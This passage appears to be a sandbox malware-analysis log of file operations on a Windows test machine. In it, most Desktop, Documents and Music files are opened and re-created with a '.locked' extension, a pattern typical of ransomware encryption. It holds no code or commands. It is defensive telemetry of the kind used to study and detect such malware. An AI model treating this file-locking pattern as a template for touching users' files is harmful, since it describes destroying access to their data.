| Create | C:\Users\CIiHmnxMn6Ps\Desktop\Wq_YnaSm3vvBO\2j004a4mmTvDfTy1ebRz.png.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\Wq_YnaSm3vvBO\2j004a4mmTvDfTy1ebRz.png.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\Wq_YnaSm3vvBO\avye6SG6OrNqPpJLT.wav | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\Wq_YnaSm3vvBO\avye6SG6OrNqPpJLT.wav.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\Wq_YnaSm3vvBO\avye6SG6OrNqPpJLT.wav.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\Wq_YnaSm3vvBO\chRxPw-aovmRZYFe5.mp4 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\Wq_YnaSm3vvBO\chRxPw-aovmRZYFe5.mp4.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\Wq_YnaSm3vvBO\chRxPw-aovmRZYFe5.mp4.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\Wq_YnaSm3vvBO\E99EFIcr7L.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\Wq_YnaSm3vvBO\E99EFIcr7L.jpg.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\Wq_YnaSm3vvBO\E99EFIcr7L.jpg.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\Wq_YnaSm3vvBO\u02MUR-nEH a134.wav | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\Wq_YnaSm3vvBO\u02MUR-nEH a134.wav.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\Wq_YnaSm3vvBO\u02MUR-nEH a134.wav.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\Wq_YnaSm3vvBO\VysxUTnE 1_O.wav | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\Wq_YnaSm3vvBO\VysxUTnE 1_O.wav.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\Wq_YnaSm3vvBO\VysxUTnE 1_O.wav.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\3y45.bmp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\3y45.bmp.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\3y45.bmp.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\850T3GF5bL3iQnYCws.bmp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\850T3GF5bL3iQnYCws.bmp.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\850T3GF5bL3iQnYCws.bmp.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\8bbtkH F.mp4 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\8bbtkH F.mp4.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\8bbtkH F.mp4.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\8BQ91jCUNzN-TOt.bmp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\8BQ91jCUNzN-TOt.bmp.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\8BQ91jCUNzN-TOt.bmp.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\Erp22jU.mp3 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\Erp22jU.mp3.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\Erp22jU.mp3.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\G-z5ID0rnHsJx.avi | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\G-z5ID0rnHsJx.avi.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\G-z5ID0rnHsJx.avi.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\HJKQ1w8r3DI.wav | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\HJKQ1w8r3DI.wav.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\HJKQ1w8r3DI.wav.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\KX_rKkh.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\KX_rKkh.png.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\KX_rKkh.png.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\QjIEj I9piC4hqUk.mp4 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\QjIEj I9piC4hqUk.mp4.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\QjIEj I9piC4hqUk.mp4.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\qsQ6mdKI ceY3bwGJV_.bmp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\qsQ6mdKI ceY3bwGJV_.bmp.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\qsQ6mdKI ceY3bwGJV_.bmp.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\SIwc yV9OudDSB.bmp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\SIwc yV9OudDSB.bmp.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\SIwc yV9OudDSB.bmp.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\ws0VxQ YI2xL3-J-kc.pdf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\ws0VxQ YI2xL3-J-kc.pdf.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\ws0VxQ YI2xL3-J-kc.pdf.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\Y Te5DP3Fa8_J.avi | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\Y Te5DP3Fa8_J.avi.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\Y Te5DP3Fa8_J.avi.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\YkLAdH4jxPx.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\YkLAdH4jxPx.png.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\YkLAdH4jxPx.png.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\zRlka8_dcwUT9gHk.avi | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\zRlka8_dcwUT9gHk.avi.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\zRlka8_dcwUT9gHk.avi.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\XfssG\34VA\OcPeaRy wKXh7Zpv1pc-.ppt | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\XfssG\34VA\OcPeaRy wKXh7Zpv1pc-.ppt.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\XfssG\34VA\OcPeaRy wKXh7Zpv1pc-.ppt.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\XfssG\8HE3QHMMwwsp.doc | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\XfssG\8HE3QHMMwwsp.doc.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\XfssG\8HE3QHMMwwsp.doc.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\XfssG\fSiPZfDNF8xgDRdCY 9g.xls | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\XfssG\fSiPZfDNF8xgDRdCY 9g.xls.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\XfssG\fSiPZfDNF8xgDRdCY 9g.xls.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\XfssG\WDBlAHKP6H9 IkBgIgR_.xls | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\XfssG\WDBlAHKP6H9 IkBgIgR_.xls.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\XfssG\WDBlAHKP6H9 IkBgIgR_.xls.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\3_ fEzbQOQ0OWFLq.xls | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\3_ fEzbQOQ0OWFLq.xls.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\3_ fEzbQOQ0OWFLq.xls.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\andYoimUhyfy9eLS.pdf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\andYoimUhyfy9eLS.pdf.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\andYoimUhyfy9eLS.pdf.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\CN1wFaPbXT9OrbkJc6lP.xls | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\CN1wFaPbXT9OrbkJc6lP.xls.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\CN1wFaPbXT9OrbkJc6lP.xls.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\LY w2asH62Gyp9.pdf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\LY w2asH62Gyp9.pdf.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\LY w2asH62Gyp9.pdf.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\4kMPOQ1co0CdpuvydAl\baWSP-fkTz36aO5HJF\eC-gacxUBFmRRUn.wav | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\4kMPOQ1co0CdpuvydAl\baWSP-fkTz36aO5HJF\eC-gacxUBFmRRUn.wav.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\4kMPOQ1co0CdpuvydAl\baWSP-fkTz36aO5HJF\eC-gacxUBFmRRUn.wav.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\4kMPOQ1co0CdpuvydAl\baWSP-fkTz36aO5HJF\gA3Q.mp3 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\4kMPOQ1co0CdpuvydAl\baWSP-fkTz36aO5HJF\gA3Q.mp3.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\4kMPOQ1co0CdpuvydAl\baWSP-fkTz36aO5HJF\gA3Q.mp3.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\4kMPOQ1co0CdpuvydAl\baWSP-fkTz36aO5HJF\wa2Qnh1-ieI.wav | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\4kMPOQ1co0CdpuvydAl\baWSP-fkTz36aO5HJF\wa2Qnh1-ieI.wav.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\4kMPOQ1co0CdpuvydAl\baWSP-fkTz36aO5HJF\wa2Qnh1-ieI.wav.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\4kMPOQ1co0CdpuvydAl\QkF2RTAApL-d\StQSYWIf9AviDjW.mp3 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\4kMPOQ1co0CdpuvydAl\QkF2RTAApL-d\StQSYWIf9AviDjW.mp3.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\4kMPOQ1co0CdpuvydAl\QkF2RTAApL-d\StQSYWIf9AviDjW.mp3.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\4kMPOQ1co0CdpuvydAl\QkF2RTAApL-d\vxMZno.mp3 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\4kMPOQ1co0CdpuvydAl\QkF2RTAApL-d\vxMZno.mp3.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\4kMPOQ1co0CdpuvydAl\QkF2RTAApL-d\vxMZno.mp3.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\4kMPOQ1co0CdpuvydAl\oEILPk96.mp3 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\4kMPOQ1co0CdpuvydAl\oEILPk96.mp3.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\4kMPOQ1co0CdpuvydAl\oEILPk96.mp3.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\4kMPOQ1co0CdpuvydAl\UHH852n7JNWb6yf1z-.mp3 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\4kMPOQ1co0CdpuvydAl\UHH852n7JNWb6yf1z-.mp3.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\4kMPOQ1co0CdpuvydAl\UHH852n7JNWb6yf1z-.mp3.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\4kMPOQ1co0CdpuvydAl\WQgQtLapPlAiT.wav | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\4kMPOQ1co0CdpuvydAl\WQgQtLapPlAiT.wav.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\4kMPOQ1co0CdpuvydAl\WQgQtLapPlAiT.wav.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\4kMPOQ1co0CdpuvydAl\Z-c0IkpuKEU4ZDyc.wav | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
